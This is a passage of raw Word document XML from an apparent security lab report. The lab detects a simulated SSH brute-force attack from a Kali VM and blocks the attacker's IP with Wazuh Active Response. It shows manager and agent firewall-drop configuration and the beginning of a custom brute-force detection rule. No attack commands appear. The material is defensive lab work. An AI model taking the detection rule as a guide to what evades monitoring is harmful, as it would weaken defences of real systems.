          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BE78ACB" w14:textId="37744A50" w:rsidR="006C2F05" w:rsidRPr="000910CF" w:rsidRDefault="006C2F05" w:rsidP="003276E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C2F05">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Blocking an SSH brute-force attack with Active Response</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="121985B6" w14:textId="77777777" w:rsidR="00B00E59" w:rsidRPr="006C2F05" w:rsidRDefault="00B00E59" w:rsidP="003276E6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E52A05D" w14:textId="312C7087" w:rsidR="006C2F05" w:rsidRDefault="006C2F05" w:rsidP="003276E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C2F05">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Simulate an SSH brute-force attack from the Kali VM against the Ubuntu endpoint, detect the attack with Wazuh, and automatically block the attacker IP using Active Response (firewall-drop).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DCF4393" w14:textId="77777777" w:rsidR="00EE4FDA" w:rsidRDefault="00EE4FDA" w:rsidP="006C2F05">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39E99A41" w14:textId="5A208D08" w:rsidR="006C2F05" w:rsidRPr="006C2F05" w:rsidRDefault="006C2F05" w:rsidP="006C2F05">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C2F05">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Context and topology</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51CF8C26" w14:textId="0B658D01" w:rsidR="006C2F05" w:rsidRPr="006C2F05" w:rsidRDefault="006C2F05">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="40"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C2F05">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Wazuh Manager (Defender):</w:t>
      </w:r>
      <w:r w:rsidRPr="006C2F05">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> wazuh-server (manager: 192.168.182.134)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22407F9F" w14:textId="41758D09" w:rsidR="006C2F05" w:rsidRPr="006C2F05" w:rsidRDefault="006C2F05">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="40"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C2F05">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Endpoint (Victim):</w:t>
      </w:r>
      <w:r w:rsidRPr="006C2F05">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> Ubuntu-Desktop with Wazuh Agent installed (lab IP: 192.168.182.131)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F6CCD3B" w14:textId="133D7413" w:rsidR="006C2F05" w:rsidRPr="006C2F05" w:rsidRDefault="006C2F05">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="40"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C2F05">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Attacker:</w:t>
      </w:r>
      <w:r w:rsidRPr="006C2F05">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> Kali VM (IP during tests: 192.168.182.136)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03408D88" w14:textId="77777777" w:rsidR="00061ACE" w:rsidRPr="00061ACE" w:rsidRDefault="00061ACE" w:rsidP="00061ACE">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00061ACE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>pplied configuration (summary)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E824F3B" w14:textId="77777777" w:rsidR="00061ACE" w:rsidRPr="00061ACE" w:rsidRDefault="00061ACE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="41"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00061ACE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Wazuh Manager (/var/ossec/etc/ossec.conf):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48266673" w14:textId="6AF03148" w:rsidR="00061ACE" w:rsidRDefault="00061ACE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="41"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00061ACE">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Declare the active-response command:</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061ACE" w14:paraId="03475816" w14:textId="77777777" w:rsidTr="00061ACE">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10456" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="0EF7B21D" w14:textId="77777777" w:rsidR="00061ACE" w:rsidRPr="00061ACE" w:rsidRDefault="00061ACE" w:rsidP="00061ACE">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00061ACE">
              <w:t>&lt;command&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4F78BE07" w14:textId="747E10AC" w:rsidR="00061ACE" w:rsidRPr="00061ACE" w:rsidRDefault="00061ACE" w:rsidP="00061ACE">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
            <w:r w:rsidRPr="00061ACE">
              <w:t>&lt;name&gt;firewall-drop&lt;/name&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="661EF4EC" w14:textId="339F41EC" w:rsidR="00061ACE" w:rsidRPr="00061ACE" w:rsidRDefault="00061ACE" w:rsidP="00061ACE">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
            <w:r w:rsidRPr="00061ACE">
              <w:t>&lt;executable&gt;firewall-drop&lt;/executable&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4CA6EE88" w14:textId="3D060684" w:rsidR="00061ACE" w:rsidRPr="00061ACE" w:rsidRDefault="00061ACE" w:rsidP="00061ACE">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
            <w:r w:rsidRPr="00061ACE">
              <w:t>&lt;timeout_allowed&gt;yes&lt;/timeout_allowed&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="74F5583F" w14:textId="247B1E3D" w:rsidR="00061ACE" w:rsidRPr="00061ACE" w:rsidRDefault="00061ACE" w:rsidP="00061ACE">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00061ACE">
              <w:t>&lt;/command&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="51C115B9" w14:textId="77777777" w:rsidR="00061ACE" w:rsidRPr="00061ACE" w:rsidRDefault="00061ACE" w:rsidP="00061ACE">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D65B3D7" w14:textId="77777777" w:rsidR="00061ACE" w:rsidRDefault="00061ACE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="41"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00061ACE">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Declared an active-response with local location (to run on the agent) linked to the SSH detection rul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4965DC" w:rsidRPr="00110652" w14:paraId="6DEDDF96" w14:textId="77777777" w:rsidTr="004965DC">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10456" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="7D3C0E5D" w14:textId="77777777" w:rsidR="004965DC" w:rsidRPr="004965DC" w:rsidRDefault="004965DC" w:rsidP="004965DC">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="004965DC">
              <w:t>&lt;active-response&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="03FFF9EE" w14:textId="06CA08BB" w:rsidR="004965DC" w:rsidRPr="004965DC" w:rsidRDefault="004965DC" w:rsidP="004965DC">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
            <w:r w:rsidRPr="004965DC">
              <w:t>&lt;disabled&gt;no&lt;/disabled&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0E23D87C" w14:textId="78C94C1B" w:rsidR="004965DC" w:rsidRPr="004965DC" w:rsidRDefault="004965DC" w:rsidP="004965DC">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
            <w:r w:rsidRPr="004965DC">
              <w:t>&lt;command&gt;firewall-drop&lt;/command&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1034C94B" w14:textId="1F8B48B3" w:rsidR="004965DC" w:rsidRPr="004965DC" w:rsidRDefault="004965DC" w:rsidP="004965DC">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
            <w:r w:rsidRPr="004965DC">
              <w:t>&lt;location&gt;local&lt;/location&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="541AF738" w14:textId="480EF1C8" w:rsidR="004965DC" w:rsidRDefault="004965DC" w:rsidP="004965DC">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
            <w:r w:rsidRPr="004965DC">
              <w:t>&lt;rules_id&gt;</w:t>
            </w:r>
            <w:r w:rsidR="00F56897">
              <w:t>100300</w:t>
            </w:r>
            <w:r w:rsidRPr="004965DC">
              <w:t>&lt;/rules_id&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="179CFCDF" w14:textId="3276C33C" w:rsidR="00F56897" w:rsidRPr="004965DC" w:rsidRDefault="00F56897" w:rsidP="004965DC">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
              <w:rPr>
                <w:lang w:eastAsia="fr-FR"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
            <w:r w:rsidRPr="004965DC">
              <w:rPr>
                <w:lang w:eastAsia="fr-FR"/>
              </w:rPr>
              <w:t>&lt;timeout&gt;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="fr-FR"/>
              </w:rPr>
              <w:t>180</w:t>
            </w:r>
            <w:r w:rsidRPr="004965DC">
              <w:rPr>
                <w:lang w:eastAsia="fr-FR"/>
              </w:rPr>
              <w:t xml:space="preserve">&lt;/timeout&gt; &lt;!-- Blocks for </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="fr-FR"/>
              </w:rPr>
              <w:t>180</w:t>
            </w:r>
            <w:r w:rsidRPr="004965DC">
              <w:rPr>
                <w:lang w:eastAsia="fr-FR"/>
              </w:rPr>
              <w:t xml:space="preserve"> second</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="fr-FR"/>
              </w:rPr>
              <w:t>s</w:t>
            </w:r>
            <w:r w:rsidRPr="004965DC">
              <w:rPr>
                <w:lang w:eastAsia="fr-FR"/>
              </w:rPr>
              <w:t>--&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="08C0F7C4" w14:textId="4CBBA202" w:rsidR="004965DC" w:rsidRPr="004965DC" w:rsidRDefault="004965DC" w:rsidP="004965DC">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="004965DC">
              <w:t>&lt;/active-response&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="46ED36CE" w14:textId="77777777" w:rsidR="004965DC" w:rsidRPr="00061ACE" w:rsidRDefault="004965DC" w:rsidP="004965DC">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="011C4125" w14:textId="77777777" w:rsidR="00061ACE" w:rsidRPr="00061ACE" w:rsidRDefault="00061ACE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="41"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00061ACE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Ubuntu Agent (/var/ossec/etc/ossec.conf):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33FBE822" w14:textId="77777777" w:rsidR="00061ACE" w:rsidRDefault="00061ACE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="41"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00061ACE">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Declared the firewall-drop command (same name as on the manag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4965DC" w14:paraId="4EF53FC4" w14:textId="77777777" w:rsidTr="004965DC">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10456" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="61FA257D" w14:textId="77777777" w:rsidR="004965DC" w:rsidRPr="00061ACE" w:rsidRDefault="004965DC" w:rsidP="004965DC">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00061ACE">
              <w:t>&lt;command&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="547D0FFD" w14:textId="77777777" w:rsidR="004965DC" w:rsidRPr="00061ACE" w:rsidRDefault="004965DC" w:rsidP="004965DC">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
            <w:r w:rsidRPr="00061ACE">
              <w:t>&lt;name&gt;firewall-drop&lt;/name&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5CDB461C" w14:textId="77777777" w:rsidR="004965DC" w:rsidRPr="00061ACE" w:rsidRDefault="004965DC" w:rsidP="004965DC">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
            <w:r w:rsidRPr="00061ACE">
              <w:t>&lt;executable&gt;firewall-drop&lt;/executable&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="631D7AE9" w14:textId="77777777" w:rsidR="004965DC" w:rsidRPr="00061ACE" w:rsidRDefault="004965DC" w:rsidP="004965DC">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
            <w:r w:rsidRPr="00061ACE">
              <w:t>&lt;timeout_allowed&gt;yes&lt;/timeout_allowed&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1AC9E8D0" w14:textId="2D9786EB" w:rsidR="004965DC" w:rsidRDefault="004965DC" w:rsidP="004965DC">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00061ACE">
              <w:t>&lt;/command&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4FE66A5D" w14:textId="77777777" w:rsidR="004965DC" w:rsidRPr="00061ACE" w:rsidRDefault="004965DC" w:rsidP="004965DC">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59C27A10" w14:textId="77777777" w:rsidR="00061ACE" w:rsidRDefault="00061ACE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="41"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00061ACE">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Configured a local active-response with a timeout to avoid permanent bloc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4965DC" w:rsidRPr="00110652" w14:paraId="46240A41" w14:textId="77777777" w:rsidTr="00FB07CD">
        <w:trPr>
          <w:trHeight w:val="58"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10456" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="5D596762" w14:textId="77777777" w:rsidR="004965DC" w:rsidRPr="004965DC" w:rsidRDefault="004965DC" w:rsidP="004965DC">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
              <w:rPr>
                <w:lang w:eastAsia="fr-FR"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004965DC">
              <w:rPr>
                <w:lang w:eastAsia="fr-FR"/>
              </w:rPr>
              <w:t>&lt;active-response&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="49DFF869" w14:textId="77777777" w:rsidR="004965DC" w:rsidRPr="004965DC" w:rsidRDefault="004965DC" w:rsidP="004965DC">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
              <w:rPr>
                <w:lang w:eastAsia="fr-FR"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004965DC">
              <w:rPr>
                <w:lang w:eastAsia="fr-FR"/>
              </w:rPr>
              <w:t>&lt;disabled&gt;no&lt;/disabled&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3049BDDF" w14:textId="77777777" w:rsidR="004965DC" w:rsidRPr="004965DC" w:rsidRDefault="004965DC" w:rsidP="004965DC">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
              <w:rPr>
                <w:lang w:eastAsia="fr-FR"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004965DC">
              <w:rPr>
                <w:lang w:eastAsia="fr-FR"/>
              </w:rPr>
              <w:t>&lt;command&gt;firewall-drop&lt;/command&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1805D2CE" w14:textId="77777777" w:rsidR="004965DC" w:rsidRPr="004965DC" w:rsidRDefault="004965DC" w:rsidP="004965DC">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
              <w:rPr>
                <w:lang w:eastAsia="fr-FR"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004965DC">
              <w:rPr>
                <w:lang w:eastAsia="fr-FR"/>
              </w:rPr>
              <w:t>&lt;location&gt;local&lt;/location&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3274E48E" w14:textId="5527256F" w:rsidR="004965DC" w:rsidRPr="004965DC" w:rsidRDefault="004965DC" w:rsidP="004965DC">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
              <w:rPr>
                <w:lang w:eastAsia="fr-FR"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004965DC">
              <w:rPr>
                <w:lang w:eastAsia="fr-FR"/>
              </w:rPr>
              <w:t>&lt;rules_id&gt;</w:t>
            </w:r>
            <w:r w:rsidR="00F56897">
              <w:rPr>
                <w:lang w:eastAsia="fr-FR"/>
              </w:rPr>
              <w:t>100300</w:t>
            </w:r>
            <w:r w:rsidRPr="004965DC">
              <w:rPr>
                <w:lang w:eastAsia="fr-FR"/>
              </w:rPr>
              <w:t>&lt;/rules_id&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4970EC82" w14:textId="6D2A696F" w:rsidR="004965DC" w:rsidRPr="004965DC" w:rsidRDefault="004965DC" w:rsidP="004965DC">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
              <w:rPr>
                <w:lang w:eastAsia="fr-FR"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004965DC">
              <w:rPr>
                <w:lang w:eastAsia="fr-FR"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>&lt;timeout&gt;</w:t>
            </w:r>
            <w:r w:rsidR="00F56897">
              <w:rPr>
                <w:lang w:eastAsia="fr-FR"/>
              </w:rPr>
              <w:t>180</w:t>
            </w:r>
            <w:r w:rsidRPr="004965DC">
              <w:rPr>
                <w:lang w:eastAsia="fr-FR"/>
              </w:rPr>
              <w:t xml:space="preserve">&lt;/timeout&gt; &lt;!-- Blocks for </w:t>
            </w:r>
            <w:r w:rsidR="00F56897">
              <w:rPr>
                <w:lang w:eastAsia="fr-FR"/>
              </w:rPr>
              <w:t>180</w:t>
            </w:r>
            <w:r w:rsidRPr="004965DC">
              <w:rPr>
                <w:lang w:eastAsia="fr-FR"/>
              </w:rPr>
              <w:t xml:space="preserve"> seconds--&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1AFBBA3A" w14:textId="556685B7" w:rsidR="004965DC" w:rsidRPr="004965DC" w:rsidRDefault="004965DC" w:rsidP="004965DC">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
              <w:rPr>
                <w:lang w:eastAsia="fr-FR"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004965DC">
              <w:rPr>
                <w:lang w:eastAsia="fr-FR"/>
              </w:rPr>
              <w:t>&lt;/active-response&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="495B1FB7" w14:textId="77777777" w:rsidR="00F56897" w:rsidRDefault="00F56897" w:rsidP="00F56897">
      <w:pPr>
        <w:pStyle w:val="CoDe0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F56897">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">&lt;timeout&gt;180&lt;/timeout&gt; &lt;!-- Blocks for 180 seconds </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D75DA95" w14:textId="2820581F" w:rsidR="00F56897" w:rsidRDefault="00F56897" w:rsidP="00F56897">
      <w:pPr>
        <w:pStyle w:val="CoDe0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F56897">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E8"/>
      </w:r>
      <w:r w:rsidRPr="00F56897">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>without timeout that cause persistent blocks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EFA07CA" w14:textId="77777777" w:rsidR="00F56897" w:rsidRPr="00F56897" w:rsidRDefault="00F56897" w:rsidP="00F56897">
      <w:pPr>
        <w:pStyle w:val="CoDe0"/>
        <w:rPr>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="494E8A16" w14:textId="77777777" w:rsidR="00F56897" w:rsidRDefault="00F56897" w:rsidP="00F56897">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F56897">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Custom SSH Brute-Force Rul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F56897" w14:paraId="7DF8542C" w14:textId="77777777" w:rsidTr="00F56897">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10456" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="544FF905" w14:textId="77777777" w:rsidR="00F56897" w:rsidRPr="00F56897" w:rsidRDefault="00F56897" w:rsidP="00F56897">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00F56897">
              <w:t>&lt;!-- SSH brute-force correlation &amp; active-response --&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1B111F98" w14:textId="77777777" w:rsidR="00F56897" w:rsidRPr="00F56897" w:rsidRDefault="00F56897" w:rsidP="00F56897">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00F56897">
              <w:t>&lt;group name="sshd,correlation"&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7AF5B779" w14:textId="77777777" w:rsidR="00F56897" w:rsidRPr="00F56897" w:rsidRDefault="00F56897" w:rsidP="00F56897">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3F8C9212" w14:textId="77777777" w:rsidR="00F56897" w:rsidRPr="00F56897" w:rsidRDefault="00F56897" w:rsidP="00F56897">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00F56897">
              <w:t xml:space="preserve">  &lt;!-- Detect brute force --&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0ECC92C9" w14:textId="77777777" w:rsidR="00F56897" w:rsidRPr="00F56897" w:rsidRDefault="00F56897" w:rsidP="00F56897">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00F56897">
              <w:t xml:space="preserve">  &lt;rule id="100300" level="10"&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5927DF1E" w14:textId="77777777" w:rsidR="00F56897" w:rsidRPr="00F56897" w:rsidRDefault="00F56897" w:rsidP="00F56897">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00F56897">
              <w:t xml:space="preserve">    &lt;if_matched_sid&gt;5760&lt;/if_matched_sid&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="69A76148" w14:textId="77777777" w:rsidR="00F56897" w:rsidRPr="00F56897" w:rsidRDefault="00F56897" w:rsidP="00F56897">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00F56897">
              <w:t xml:space="preserve">    &lt;description&gt;SSH brute force attack trying to get access to the system (multiple SSH auth failures detected).&lt;/description&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="554BE9C3" w14:textId="77777777" w:rsidR="00F56897" w:rsidRPr="00F56897" w:rsidRDefault="00F56897" w:rsidP="00F56897">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00F56897">
              <w:t xml:space="preserve">    &lt;options&gt;no_full_log&lt;/options&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5C53B92D" w14:textId="77777777" w:rsidR="00F56897" w:rsidRPr="00F56897" w:rsidRDefault="00F56897" w:rsidP="00F56897">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
